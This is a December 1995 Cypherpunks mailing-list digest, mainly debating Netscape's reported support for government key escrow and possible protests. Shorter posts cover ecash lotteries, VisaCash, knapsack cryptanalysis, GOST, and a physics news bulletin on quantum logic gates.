From ljo at ausys.se Fri Dec 1 03:48:51 1995 From: ljo at ausys.se (Johansson Lars) Date: Fri, 1 Dec 95 03:48:51 PST Subject: VisaCash security. Message-ID: <95Dec1.124621gmt+0100.53761@void.ausys.se> wrote: > I think the Visa stuff is basically stored value and >rechargeable smart cards, not really ecash type money. Supposedly >you'll be able to get a card with $10 or $20 on it and all the >vending machines and phones around the Olympic venues will be set >up to take the cards. So to answer your questions, no it's not really >digital cash (like ecash); and yes I think it's probably traceable >to some extent (unless you buy stored value cards w/paper cash). > > First Union, the bank selling the cards, has a page on them: > >http://www.firstunion.com/visacash/ > > Low on the technical info, but they give an address to mail >questions to. A couple of weeks ago I was giving a talk at a conferance on computer technology in financial applications in Stockholm. I mentioned VISA:s electronic purse 'Smart Cash' in my talk and during the break afterwards a representative from a danish bank told me that VISA:s 'Smart Cash' was actually bought from the danish purse/project 'Danmont'. Does anyone know the truth of this, please let me know. Regards, /Lars Johansson ljo at ausys.se From JR at ROCK.CNB.UAM.ES Fri Dec 1 03:59:20 1995 From: JR at ROCK.CNB.UAM.ES (JR at ROCK.CNB.UAM.ES) Date: Fri, 1 Dec 95 03:59:20 PST Subject: Netscape gives in to key escrow Message-ID: <951201140557.20a03b98@ROCK.CNB.UAM.ES> From: SMTP%"tcmay at got.net" 1-DEC-1995 12:26:55.99 >With the assumption that this is not a troll, and giving the writer some No, it isn't. >At 10:45 AM 12/1/95, JR at ns.cnb.uam.es wrote: >>With regard to all this waving about Netscape giving in to key scrow... > >Key _escrow_, though "scrow" is perhaps just as accurate as the >improperly-named "key escrow" (hint: escrow is something done voluntarily, >not the situation here with GAK). > Yup. I should have said "mandatory key scrow". Sorry for using a shorthand. >Having said this, I think all of the shareholders, either of issued shares >or as-yet-unissued shares, are interested in maximizing share value. Not >surprising. That's the point. They look after *their* interests, not after "public" interest, specially where "public" is a local (as big as local to US may be) interest in a global economy. >Importantly--and maybe this is the real point JR is making--we on the >Cypherpunks list are probably *not* interested in Netscape's stock price. >But who cares? Our role is not to maximize Netscape stock price, but to >talk about what is "right" and what is not right. And GAK is definitely not >right, to the vast majority of us. Right. What I wanted to say was exactly that. >They were "criticized" not because they went public with their stock but >because of their security mistakes, made more important by their sudden The point is not why they were chased but the fact they were. It reflects on further reticences by crypto-interested people to get involved and opens more field to crypto-unaware or uninterested people to gain control of the company. ... >Well, this is the point, isn't it? I doubt there are such things as "tax >reliefs" for Netscape--these things are done pretty much out in the open in >the U.S., and any special tax treatment would be widely noticed--but there >may indeed have been "discussions" with senior management at Netscape. >Several of us have already speculated in broad terms on this. Well, I don't know about what kind of compensation could be offered. Tax reliefs was just a suggestion. What about saying "hey guys, if you comply with our demands we'll set Netscape as the standard browser for the administration. If you don't you won't sell a copy". In any case, the point is that a Government (anY) can make strong pressure, specially one as big as USA's Gov. And facing it is a risky position. ... >First, a viable strategy is to simply do nothing. Ignore the goverment's >protestations, drag one's feet, shrug, etc. Jim Clark could simply have >said nothing. (Recall that Bill Gates came out recently saying that strong >encryption is inevitable...Clark could have either said nothing, or said >something similar to what Gates said.) That may be a very bad move from their point of view. If the Gov. pushes hard, and it is an important customer, it is in their interest to satisfy them. As long as anyone else wants to follow the Gov. it is also good for them to follow those lines, and to be the firsts ones. What about foreign customers? If the Gov. can restrict export of your technologies, they'll move to other providers. It is better for you to pay hommage to the Gov. requests and get to overseas markets faster and sooner than anyone else. >Second, the issue is not "satisfying" a "bunch of cypherpunks." If Netscape >truly pushes for GAK, and people reject GAK and Netscape, then this will >surely hurt shareholder value. (Frankly, I expect one or more stories to >appear in the next few days about the budding "Friends Don't Let Friends >Use Netscape" and "Just Say No to Netscape" movements. Whether this will >hurt the stock is unclear.) The "just say no" movement is OK as long as you don't append "to XXX". It could work if it is only Netscape... But as soon as anyone else gives in (e.g. Microsoft) it will become a burden. It's much better IMHO to ask "say yes to privacy". It's much better to say "this page is optimized for good safety and may not be reliable under non-crypto browsers -e.g. Netscape-" than saying "your browser is bad". Which BTW, may be OK in the USA, but is not in other places. Belgium comes to mind for forbidding negative advertising. And surely others. ... >I say that the ideas being discussed are in fact "constructive" ideas. I >won't reiterate them all here, but they clearly involve concrete action >(e.g., modifying server software to issue warnings to Netscape users, or >encouragement of alternatives to Netscape). Some of them are. Others are not. Others are destructive (like denying access to Netscape users), or unpracticable (like saying "Mozilla is not the best thing" in some places), or unrealistic (like saying "quit your job"), or plain silly. If you deny access to a user, you'll make him/her angry. And not angry with Netscape. They'll be angry with you. We need people on our side. That's basic psicology. I'd go for more pages explaining what crypto is and can do for Joe Random. Many people has said "I can do this or that with my server or whatever". How many people is offering an alternate safe crypto service and making it interesting and desirable for Joe Random? And making it well known? I'd say that not enough. If you can offer an attractive service, protected with another crypto method, and make it popular, people will demand it. If you just add a note saying you use that crypto 'cos Government-enforced crypto is not good enough, people will feel happy and will learn. In general, people prefers positive presentations to complains or problems. Have a look at TV ads. How many of them say "Don't use that stuff, it's shit" instead of "Use my stuff, it's better". That's what I advocate: a positive course of action, offering a better alternative. Not just a storm of complains or "bad karma". >What more are you expecting? Have you been reading what people are actually >discussing doing and actually already doing? > Yes, I've read all along. As I hope will be more clear now. And I have found lots of people saying "I won't support Netscape", "I will say no", "I will deny access to Netscape", "I'll add a complain to my page", "Jim should retract", "Netscape should go back", "Netscape better changes its money-making policy and becomes a political activist", "This or that guy must quit job"... What I was expecting is people to be more realistic, not to forget that the main goal of a company is to make money instead of defending public freedom (which indeed is bad for business), and start promoting better (or not) alternatives. And, to finish, note that I have also seen some very good answers, on which I don't coment since I agree and have little to add to. >--Tim May > jr From physnews at aip.org Fri Dec 1 11:44:34 1995 From: physnews at aip.org (AIP listserver) Date: Fri, 1 Dec 95 14:44:34 EST Subject: update.250 Message-ID: <9512011944.AA12171@aip.org> PHYSICS NEWS UPDATE The American Institute of Physics Bulletin of Physics News Number 250 December 1, 1995 by Phillip F. Schewe and Ben Stein TWO-BIT QUANTUM LOGIC GATES have been experimentally demonstrated for the first time. Analogous to conventional electronic logic gates in personal computers but different in that they follow the strange rules of quantum mechanics, a quantum logic gate, in its simplest form, consists of two "qubits." Each qubit is a quantum system (for example an atom or a photon) having two states corresponding to the 0 and 1 of a conventional gate. Unlike an ordinary digital bit, a qubit can be in a combination or "superposition" of 0 and 1, offering the potential for unique kinds of calculations. A NIST team (Chris Monroe, 303-497-7415) uses a single trapped beryllium ion to demonstrate a two-bit quantum logic gate. One bit, the control bit, is specified by the (quantized) external vibrations of the ion in the atom trap; the two lowest vibrational levels correspond to values 0 and 1. The other bit (the target bit) is specified by an internal state of one of the ion's electrons; it has a "spin-down" state (0) and a "spin-up" state (1). Shooting laser pulses at the single ion causes it to act as a two-bit "controlled NOT" gate. If the control bit is 0 then the target bit is left alone. If the control bit is 1 then the target bit flips its spin. Meanwhile, a Caltech group (Quentin Turchette, 818-395-8343) has demonstrated the feasibility of using a pair of electromagnetic fields (each representing a single photon or less) as a two-bit quantum gate. When the two fields interact with an atomic beam in between a narrow cavity, the first field, having one of two orientations, or "polarizations," can control the phase of the second field; switching the polarization prevents the first field from controlling the phase. Finally, in a paper submitted to Physical Review Letters, a team at the Ecole Normale Superieure (Serge Haroche, haroche at physique.ens.fr) reports a quantum logic gate in which a two-level electromagnetic field in a cavity changes the energy level of a Rydberg atom (an atom in a highly excited state) in the cavity. All groups are currently attempting to string together multiple gates, but this remains a major challenge. Performing the powerful calculations envisioned with quantum computers would probably require thousands of gates, but Haroche warns that systems of quantum gates are likely to become "decoherent," or lose their quantum properties, beyond several tens or hundreds of gates. While practical "quantum computers" might be difficult to realize with present concepts, physicists believe these two-bit experiments may pay off by opening possibilities for practical schemes of quantum teleportation and quantum cryptography and by bringing new insights into, as Haroche puts it, "the fuzzy boundary between the classical and quantum worlds." (C. Monroe et al. and Q. A. Turchette et al., two upcoming articles in Physical Review Letters, tentatively Dec. 11; journalists should contact AIP Public Information at physnews at aip.org) EVIDENCE FOR COSMIC RAYS COMING FROM A SUPERNOVA has finally been observed. The standard opinion about cosmic rays is that the lower-energy rays (up to an energy of 10**15 eV) probably originate in our galaxy and consist of electrons and ions accelerated to high speeds by supernova shocks. (Higher-energy cosmic rays may be extragalactic in origin.) New pictures of supernova SN1006 recorded by the orbiting ASCA x-ray telescope reveal both thermal x rays---the radiation coming from supernova remnant material at high temperature---and non-thermal x rays from the limb of the supernova---synchrotron radiation from high energy electrons (100 TeV), presumably energized by the outward-moving shock front from the supernova. The ASCA scientists expect that ions too are being accelerated by the same mechanism. (K. Koyama et al., Nature, 16 November.) From dlv at bwalk.dm.com Fri Dec 1 00:10:45 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Fri, 1 Dec 1995 16:10:45 +0800 Subject: ecash lottery (Was: ecash casino) In-Reply-To: <49j0sq$a69@calum.csclub.uwaterloo.ca> Message-ID: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) writes: > So; is there a problem with the implementation outlined above? What about the income tax on winnings? > If it were > implemented, would people play it? I probably would, if I get off my lazy ass to get an ecash account. :) --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From eamon at cosc.canterbury.ac.nz Fri Dec 1 00:12:22 1995 From: eamon at cosc.canterbury.ac.nz (Eamon Daly) Date: Fri, 1 Dec 1995 16:12:22 +0800 Subject: Knapsack-based cryptosystems Message-ID: <199511300231.PAA21496@kiwi> Some convoluted questions for knowledgeable c'punks: What's the state-of-the-art in cryptanalysis of knapsack-based cryptosystems? I know the fate of Merkle-Hellman, Graham- Shamir etc. as written by Brickell and Odlyzko in _Contemporary Cryptology_ (edited by Simmons). What of the Chor-Rivest cryptosystem (I'm aware of the attack in Eurocrypt 95)? Finally, has any work been done on cryptanalysis of the dense compact knapsack-based cryptosystem of Glenn Orton? ("A Multiple-Iterated Trapdoor for Dense Compact Knapsacks" in _Eurocrypt 94_) Thanks for any information. Eamon Daly From sameer at c2.org Fri Dec 1 00:12:31 1995 From: sameer at c2.org (sameer) Date: Fri, 1 Dec 1995 16:12:31 +0800 Subject: ecash lottery (Was: ecash casino) In-Reply-To: <49j0sq$a69@calum.csclub.uwaterloo.ca> Message-ID: <199511300250.SAA07657@infinity.c2.org> > > So; is there a problem with the implementation outlined above? If it were > implemented, would people play it? > I think it would be easier if the lottery owner was just in a safe jurisdiction. Then he wouldn't have to worry about the legality of it, and not worry about his anonymity. Gambling-safe jurisdictions *do* exist. There lies a problem if *playing* a game is illegal in the US, which I beleive it may be. If the winners can be revealed by bank/lottery collusion, then in order to protect the winners the lottery can't collude with the bank. This may not be a problem, because the lottery isn't subject to US law, so there would be no way to force the lottery to collude with the bank to reveaol the identities of the winners. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From adam at lighthouse.homeport.org Fri Dec 1 00:13:58 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Fri, 1 Dec 1995 16:13:58 +0800 Subject: GOST for sale In-Reply-To: <199511292216.QAA25781@duracef.shout.net> Message-ID: <199511300239.VAA16572@homeport.org> Chris Stillson wrote: | What I wonder about is why anyone would use the Algorithm | that the NSA is probably best at breaking. Breaking GOST was probably | their number one project for years, and I would suspect that they | have done it. Bamford (The Puzzle Palace) suggests that no major Soviet or American cipher has been cryptanalyzed since the early 70s or so. Ciphers are chipped at by theft of keys by spies (The Falcon and the Snowman) or military action (Seizing the Enigma). Also, you have to ask yourself, would the NSA reveal its ability to break GOST traffic? (I think it was Seymour Hersh who made the claim that the Bush administration gave Yeltsin real time breaks* of Generals plotting against him in the '92 coup attempt. In evaluating this claim, remember Bush ran the CIA for several years.) (*It also might be that the messages were not protected by GOST, were obtained by bugging in a room, or other nefarious means, as I'm sure the NSA would attest if it came out that messages were actually passed.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From nobody at REPLAY.COM Fri Dec 1 00:19:57 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 1 Dec 1995 16:19:57 +0800 Subject: A challenge ... Message-ID: <199512010800.JAA00893@utopia.hacktic.nl> >I've been challenged to try to find a bank account; I win the challenge >if I can wire in $100 to the hidden account. Anyone have any good >ideas about how to find an ABA number? This sounds like the "this is your last chance to send me $1!" ad: Announcing the 'Bank Account' Hack. Rules: Wire me $100. Reward: I'll give you a T-shirt. The *real* challenge will be getting your $100 back. From loki at obscura.com Fri Dec 1 00:24:59 1995 From: loki at obscura.com (Lance Cottrell) Date: Fri, 1 Dec 1995 16:24:59 +0800 Subject: Netscape 2.0b2 allows for invasion of privacy (fwd) Message-ID: At 7:52 PM 12/28/95, Graeme Cross wrote: >Talking of Netscape - this posting prompted me to forward it given the >security and privacy implications inherent in the problem. > >Cheers >Graeme > YOW! It is beginning to look like "At Netscape, Security is Job NONE." Something to put with the Netscape pro-GAK pages I am putting together. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From m5 at dev.tivoli.com Fri Dec 1 00:49:11 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Fri, 1 Dec 1995 16:49:11 +0800 Subject: Netscape gives in to key escrow In-Reply-To: <199511300644.WAA02011@infinity.c2.org> Message-ID: <9511301328.AA01664@alpha> Jeff Weinstein writes: > have lots of stuff attributed to Jim, but very little of it is actual > quotes. Well, if there was in fact a speech made from which the pseudo-quotes in the article were taken, then surely the full text of that speech will be made available somewhere for clarification. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From ses at tipper.oit.unc.edu Fri Dec 1 00:59:25 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Fri, 1 Dec 1995 16:59:25 +0800 Subject: Barring access to Netscape In-Reply-To: <199512010738.BAA17804@khijol> Message-ID: On Fri, 1 Dec 1995, Ed Carp wrote: > I believe that Netscape uses "Mozilla" as their keyword when > exchanging browser-specific information. The field is User-Agent. However, blocking access to users of Navigator isn't a particularly useful thing to do. If you must do something, why not modify your GET handler to add a header to the start of all html pages informing people of the problem, and suggesting alternatives. Someone else [I can't remember, but I'll call them Alice] claimed that the security problems showing up were part of a deliberate conspiracy. To anyone who knows anything about the history of these things knows how absurd this is. The principals at Netscape are a nice bunch of really guys, but were not really up to speed on issues like security and networking- for example, the first incarnation of SSL had an RC4 stream running with no checksumming whatsoever. The security problems that resulted are due to the learning curve. Simon From cactus at hks.net Fri Dec 1 01:09:22 1995 From: cactus at hks.net (Leslie Todd Masco) Date: Fri, 1 Dec 1995 17:09:22 +0800 Subject: Barring access to Netscape Message-ID: <199512010843.DAA23202@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- James A. Donald wrote: >This would not be satisfactory in itself: Ideally one would like to bring >up a page saying "Sorry, you cannot access that page because you >are using a netscape browser: Click *here* for the sad tale of >Netscape. If Netscape really does go the GAK route, I will unilaterally do this to the Cypherpunk Archives (or something similar, like every request flashing up briefly and then client-pulling the GAK pages). I've been told that many media-types go to the archives whenever c'punks make the news. How much of an effect do y'all think it'll have if they can't do it with Netscape? Shouldn't be too hard to hack this into Apache. - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBML7AKCoZzwIn1bdtAQEPhAF9HY/ARaVLTFcvyQ1utx94uZ+ZmeXOemmO 2jnX4y/gDelAEO+C7kBAprm8GDyLhgJQ =G5jT -----END PGP SIGNATURE----- From fstuart at vetmed.auburn.edu Fri Dec 1 01:32:59 1995 From: fstuart at vetmed.auburn.edu (Frank Stuart) Date: Fri, 1 Dec 1995 17:32:59 +0800 Subject: Barring access to Netscape Message-ID: <199512010917.DAA28429@snoopy.vetmed.auburn.edu> >If Netscape really does go the GAK route, I will unilaterally >do this to the Cypherpunk Archives (or something similar, like every >request flashing up briefly and then client-pulling the GAK pages). After talking to a couple of people, and playing around some, this seems to be a better choice. That way, you can actually send information (including a list of where to get other browsers) instead of just garbage to netscape users. Is anyone aware of browsers other than Netscape that do client pulls? A simple filter to do (and undo) this would still be useful, I think so that users can easily fix all their documents. Fortunately, that would be very easy to write. >I've been told that many media-types go to the archives whenever c'punks >make the news. How much of an effect do y'all think it'll have if they >can't do it with Netscape? > >Shouldn't be too hard to hack this into Apache. That's not a bad idea either. Hopefully, Netscape will post a retraction (soon!) and none of this will be necessary. Frank Stuart | (Admiral Grace) Hopper's Law: fstuart at vetmed.auburn.edu | It's easier to get forgiveness than permission. From JR at ns.cnb.uam.es Fri Dec 1 01:52:33 1995 From: JR at ns.cnb.uam.es (JR at ns.cnb.uam.es) Date: Fri, 1 Dec 1995 17:52:33 +0800 Subject: Netscape gives in to key escrow Message-ID: <951201114501.20a03b98@ROCK.CNB.UAM.ES> With regard to all this waving about Netscape giving in to key scrow... First one question, and then some considerations. The question: - How much of Netscape stock is in the hands of Netscape? I mean in the hands of the people that work in/for the Company? And how much is in outsiders whose only interest is earning as much as possible? That is, my friends, the key point. When Netscape began selling shares, and before and after that, they were (and still are) widely criticized in this list. I assume most cypherpunks didn't buy. I'd also bet many oportunists, did. And I'd bet many activists thougth this was their chance to get a hold on the development of Internet... So, now we have that most of Netscape is owned by people that either don't care but for money, or fundamental activists. And then, those people have to take decisions. And then they are faced with confronting their government who tells them what to do if they don't want to have problems. And who probably offers some hidden compensations to get their support (maybe tax reliefs?). And who menaces with countermeasures if they don't agree. Oh, they are also faced with lots of fundamentalistic priests who tell them they'll go to hell if they don't give in. Or engage in a crusade against the "evil" net. What did you expect Netscape to do? The guys with the money and the control won't face all the small shareholders and tell them they are going to be "evil" against the gov. and the priests and the religious organizations, and that they will face gov. restrictions, give up political and economic advantages, etc.. to satisfy a bunch of cypher punks that are continuously complaining publicly against the company and don't even buy shares. That's what I think that has happened. And I may be wrong. But there's a lesson to learn: there is a lot of anti-crypto guys out there. Unknowledgeable people, gul lible persons, and fanatics who won't doubt doing anything to get a total control of things. Either we try to educate them, make them more knowledgeable and less gullible, or we fight back with our own companies or buying more shares than them. Or both. Sitting back and complaining won't help crypto, freedom or anything for that matter at all. That said, before blaming more on Netscape and asking a starting company whose major aset is still shareholders instead of sales, we should think better about the correct strategy. Now, who's gonna offer some constructive ideas for a change? jr From adam at obscura.com Fri Dec 1 02:02:54 1995 From: adam at obscura.com (Adam Philipp) Date: Fri, 1 Dec 1995 18:02:54 +0800 Subject: Barring access to Netscape Message-ID: <9512010953.AA26357@toad.com> At 12:00 AM 11/30/95 -0800, you wrote: >This would not be satisfactory in itself: Ideally one would like to bring >up a page saying "Sorry, you cannot access that page because you >are using a netscape browser: Click *here* for the sad tale of >Netscape. > Here is the Netscape specific code that does exactly this: It simply send the viewer to the URL listed after ";URL" bit. I use it on my page to get to my Netscape optimized section (soon to go by the wayside). Try it an see. Adam --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\ |PGP key available on my home page|Unauthorized interception violates | | http://www.compuvar.com/adam |federal law (18 USC Section 2700 et| |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted | |SUB ROSA... |communications are preferred for | | (see home page for definition) |sensitive materials. | \-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/ From tcmay at got.net Fri Dec 1 02:27:03 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 1 Dec 1995 18:27:03 +0800 Subject: Netscape gives in to key escrow Message-ID: With the assumption that this is not a troll, and giving the writer some slack on account of the non-native-English-language origin, I'll respond to a few of his or her points: At 10:45 AM 12/1/95, JR at ns.cnb.uam.es wrote: >With regard to all this waving about Netscape giving in to key scrow... Key _escrow_, though "scrow" is perhaps just as accurate as the improperly-named "key escrow" (hint: escrow is something done voluntarily, not the situation here with GAK). >First one question, and then some considerations. The question: > >- How much of Netscape stock is in the hands of Netscape? I mean in the hands >of the people that work in/for the Company? And how much is in outsiders whose >only interest is earning as much as possible? A small fraction of the shares are now for sale. The exact numbers can be gotten from the Netscape offering prospectus (ironically, I tried to hunt for it in Infoseek, but Netscape claimed it was busy the 10 or so times I tried to run Infoseek on "Netscape"...no conspiracy, just crowding, even at 1:45 a.m. PST). In particular, the billion dollars' worth of Netscape stock (and/or options) that Jim Clark holds is mostly not on the open market (and won't be for years). Having said this, I think all of the shareholders, either of issued shares or as-yet-unissued shares, are interested in maximizing share value. Not surprising. Importantly--and maybe this is the real point JR is making--we on the Cypherpunks list are probably *not* interested in Netscape's stock price. But who cares? Our role is not to maximize Netscape stock price, but to talk about what is "right" and what is not right. And GAK is definitely not right, to the vast majority of us. >That is, my friends, the key point. When Netscape began selling shares, and >before and after that, they were (and still are) widely criticized in this >list. They were "criticized" not because they went public with their stock but because of their security mistakes, made more important by their sudden prominence. The Net/Web is being built up of beams, struts, and bricks, and it's important to point out flaws that make the beams buckle and structures collapse. ... >So, now we have that most of Netscape is owned by people that either don't >care but for money, or fundamental activists. And then, those people have to >take decisions. ??? I don't get the point you're making. Sure, most of Netscape stock that is publically traded is owned by investors. On the other hand, most of the stock that is not yet issued or is tied up in unexercised stock options is in a sense owned by people who care how well the stock does. >And then they are faced with confronting their government who tells them what >to do if they don't want to have problems. And who probably offers some hidden >compensations to get their support (maybe tax reliefs?). And who menaces with >countermeasures if they don't agree. Well, this is the point, isn't it? I doubt there are such things as "tax reliefs" for Netscape--these things are done pretty much out in the open in the U.S., and any special tax treatment would be widely noticed--but there may indeed have been "discussions" with senior management at Netscape. Several of us have already speculated in broad terms on this. Look, I don't impute personal malice to Jim Clark. I do, however, believe in "institutional evil," in the sense that a GAK regiment which says, for example, that anyone who keeps a diary must "escrow" copies of it with the local police is an "evil" idea, counter to the Western notions of liberty and justice. Thus, for whatever reason Jim Clark came out in support of GAK, we must criticize it. And take positive steps to counter it (which I think we are doing). >What did you expect Netscape to do? The guys with the money and the control >won't face all the small shareholders and tell them they are going to be >"evil" against the gov. and the priests and the religious organizations, >and that they will face gov. restrictions, give up political and economic >advantages, etc.. to satisfy a bunch of cypher >punks that are continuously >complaining publicly against the company and don't even buy shares. First, a viable strategy is to simply do nothing. Ignore the goverment's protestations, drag one's feet, shrug, etc. Jim Clark could simply have said nothing. (Recall that Bill Gates came out recently saying that strong encryption is inevitable...Clark could have either said nothing, or said something similar to what Gates said.) Second, the issue is not "satisfying" a "bunch of cypherpunks." If Netscape truly pushes for GAK, and people reject GAK and Netscape, then this will surely hurt shareholder value. (Frankly, I expect one or more stories to appear in the next few days about the budding "Friends Don't Let Friends Use Netscape" and "Just Say No to Netscape" movements. Whether this will hurt the stock is unclear.) >Sitting back and complaining won't help crypto, freedom or anything for that >matter at all. > >That said, before blaming more on Netscape and asking a starting company >whose major aset is still shareholders instead of sales, we should think >better about the correct strategy. > >Now, who's gonna offer some constructive ideas for a change? I say that the ideas being discussed are in fact "constructive" ideas. I won't reiterate them all here, but they clearly involve concrete action (e.g., modifying server software to issue warnings to Netscape users, or encouragement of alternatives to Netscape). What more are you expecting? Have you been reading what people are actually discussing doing and actually already doing? --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From unicorn at polaris.mindport.net Fri Dec 1 02:42:34 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Fri, 1 Dec 1995 18:42:34 +0800 Subject: A challenge ... In-Reply-To: <199512010735.XAA04851@netcom14.netcom.com> Message-ID: On Thu, 30 Nov 1995, Jordan Hayes wrote: > I've been challenged to try to find a bank account; I win the challenge > if I can wire in $100 to the hidden account. Anyone have any good > ideas about how to find an ABA number? For $95 I will do all the work for you. --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From jcobb at ahcbsd1.ovnet.com Fri Dec 1 02:43:47 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Fri, 1 Dec 1995 18:43:47 +0800 Subject: WTO an even worse possibility as Inet regulator. Message-ID: Friend, attila at primenet.com did the list a service when he sent his message, "WTO an even worse possibility as Inet regulator." Basing the message "on an article from the (London) Finan- cial Times," he states that a very credible white paper is circulating for the WTO to establish an internet CZAR to regualate the Internet... and he asks: personally, the Feds and the FCC are bad enough --now they want to have a **global** bureaucracy play god -??? That 11 29 95 Financial Times newsstory is headlined: Global regulator urged for information highway Who's doing the urging? The Royal Institute of International Telecommunications Policy put out a report written by a Shell man and a think- tank woman. As regards encryption, the RIITP people ...point out that issues such as...encryption...have global rather than national aspects. Then they contradict themselves: "Encryption, for example, raises tricky and emotive issues connected with...national security and cannot be treated simply as a business problem." Whatever works! They "encrypt" the ultimatums of the New World disorder in any...key. At the very end of the newsstory: Global Superhighways, Chatham House, 10 St James Square, London SW1Y 4LE I'm guessing Global Superhighways is the title of the RIITP report. As for Chatham House... In 1919 [a group of young men who became the dominant influence in British imperial and foreign affairs up to 1939] founded the Royal Institute of International Affairs (Chatham House) for which the chief financial supporters were Sir Abe Bailey and the Astor family (owners of The [London] Times). Similar Institutes of International Affairs were established in the chief British dominions and in the United States (where it is known as the Council on Foreign Relations). --Carroll Quigley [Clinton's mentor]. Tragedy and Hope. A History of the World in Our Time. Macmillan, 1966. P 132. RIITP is probably a front for RIIA. I conjecture, though, that the real publisher of the report has his house in Washington. I agree with jamesd at echeque.com who writes: The main threat to freedom is still internal, rather than external. Looked at from the inside, of course. Cordially, Jim From jsw at netscape.com Fri Dec 1 02:48:29 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Fri, 1 Dec 1995 18:48:29 +0800 Subject: Netscape 2.0b2 allows for invasion of privacy (fwd) In-Reply-To: Message-ID: <30BED7A6.623B@netscape.com> Rich Graves wrote: > > [As seen on the cypherpunks list] > > I just confirmed this for Mozilla/2.0b3 (Win95; I). I also see an entry > from the Mac version of 2.0b3. No need for anyone else to test it. Sorry Rich, you must be mistaken. All of the beta 3 entries had empty history. This problem was fixed in beta 3. > Very nasty indeed. To what other variables might someone have access? We will be reviewing everything that is reflected into livescript before the final 2.0 release. All of this stuff will also be documented so that you all can review it looking for anything dangerous. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at netscape.com Fri Dec 1 02:49:36 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Fri, 1 Dec 1995 18:49:36 +0800 Subject: Netscape 2.0b2 allows for invasion of privacy (fwd) In-Reply-To: Message-ID: <30BED8E9.16FC@netscape.com> This problem was found a few weeks ago and we fixed it immediately. You all can see the fix in Beta 3, which does not reflect the history strings into livescript. As soon as I heard of the problem I insisted that it be fixed right away. I also had a fairly extensive discussion with the creator of livescript about what other things might be dangerous. We didn't come up with anything, but will be doing a security review of livescript before the final 2.0 release just to make sure. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From carolann at censored.org Fri Dec 1 18:54:52 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Fri, 1 Dec 95 18:54:52 PST Subject: Netscape, Corporations, and GAK Support Message-ID: <199512020254.TAA04583@mailhost1.primenet.com> I know I may be asking for this a second time, But just what is James Clark's E-Mail Address? Thanks! Happy Holidays! Carol Anne -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From jsw at netscape.com Fri Dec 1 03:02:19 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Fri, 1 Dec 1995 19:02:19 +0800 Subject: Spam the Sign! In-Reply-To: Message-ID: <30BEDBF4.483A@netscape.com> jim bell wrote: > > >On September 27, Jeff Weinstein of Netscape (and others) wrote: > > > >> > > ... would be nice if we could get 128 bit keys, though ... (hint, > >> > > hint). > >> > > >> > We are working this issue with the government. As soon as we can > >> > make it available for download we will. > > > >> In other words, we will never see it in our lifetimes -- the > >> bureaucreeps aren't known for promoting the spread of strong crypto. > > > >>> Where did I imply that if the govt. ignored us or said no that we > >>> would meekly go away with tail between legs? > > Here's a question: Why can't Netscape be released WITHIN THE US with 128 > bit keys? Admittedly, it would probably...uh...escape within a few hours, > but that's no worse than what other 